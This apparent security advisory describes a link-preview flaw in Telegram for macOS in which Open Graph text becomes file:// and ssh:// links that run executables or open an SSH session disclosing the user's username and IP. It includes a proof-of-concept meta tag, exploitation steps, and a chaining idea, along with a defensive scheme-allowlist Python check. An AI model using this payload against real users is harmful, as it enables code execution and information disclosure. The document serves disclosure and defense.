In Telegram for macOS v4.9.155353 (and below), the URL parsing logic allows running arbitrary executables and launching applications via URI schemes through links injected into a website's link preview.
- Send a link to exploit.html, a regular HTML file containing the tag
<meta property="og:title" content="file://google.com/bin/sh ssh://google.com/x" />
- The website preview renders the links.
- Clicking a rendered link behaves like the NSWorkspace.open utility -> if the link points to an executable -> code execution.
- Clicking the ssh:// link -> Terminal.app pops up with an active ssh session, disclosing the user's OS username, IP and other details.
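The root cause is that text lifted from Open Graph tags is linkified and handed to the system opener without restricting the scheme. The check below is an added example (not Telegram's code) of what a preview renderer should do: extract og:title/og:description, find URL tokens, and only make http/https ones clickable; the sample HTML is constructed from the PoC tag above plus a benign link.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Schemes a link preview may safely turn into clickable links.
# file://, ssh:// and other app-launching schemes are deliberately absent.
SAFE_SCHEMES = {"http", "https"}

# Rough URL-token matcher: scheme://rest, stopping at whitespace or quotes.
URL_RE = re.compile(r"\b[a-zA-Z][a-zA-Z0-9+.-]*://[^\s\"'<>]+")


class OGParser(HTMLParser):
    """Collect Open Graph <meta property="og:*" content="..."> values."""

    def __init__(self):
        super().__init__()
        self.og = {}

    def handle_starttag(self, tag, attrs):
        if tag != "meta":
            return
        a = dict(attrs)
        prop = a.get("property", "")
        if prop.startswith("og:") and a.get("content") is not None:
            self.og[prop] = a["content"]


def classify_links(text):
    """Split URL tokens in preview text into (allowed, blocked) by scheme."""
    allowed, blocked = [], []
    for url in URL_RE.findall(text):
        scheme = urlsplit(url).scheme.lower()
        (allowed if scheme in SAFE_SCHEMES else blocked).append(url)
    return allowed, blocked


def preview_links(html):
    """Return (allowed, blocked) URLs found in og:title and og:description."""
    p = OGParser()
    p.feed(html)
    text = " ".join(p.og.get(k, "") for k in ("og:title", "og:description"))
    return classify_links(text)


# Constructed sample: the report's PoC tag plus one benign https link.
SAMPLE_HTML = """<html><head>
<meta property="og:title" content="file://google.com/bin/sh ssh://google.com/x https://example.com/page" />
</head><body></body></html>"""

if __name__ == "__main__":
    ok, bad = preview_links(SAMPLE_HTML)
    print("clickable:", ok)   # only the https link
    print("blocked:  ", bad)  # file:// and ssh:// never reach NSWorkspace.open
```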
The bug could be used:
- to disclose info about the user's machine -> OS username, IP, etc.
- to run arbitrary executables and open arbitrary files on the OS
- to launch arbitrary applications via URI schemes
This bug could be chained with the Quarantine issue to open downloaded, quarantine-ignored files and so escalate to running an attacker-supplied executable.
This bug also exists on iOS; the PoC is the same. The impact there is possibly limited to URI schemes.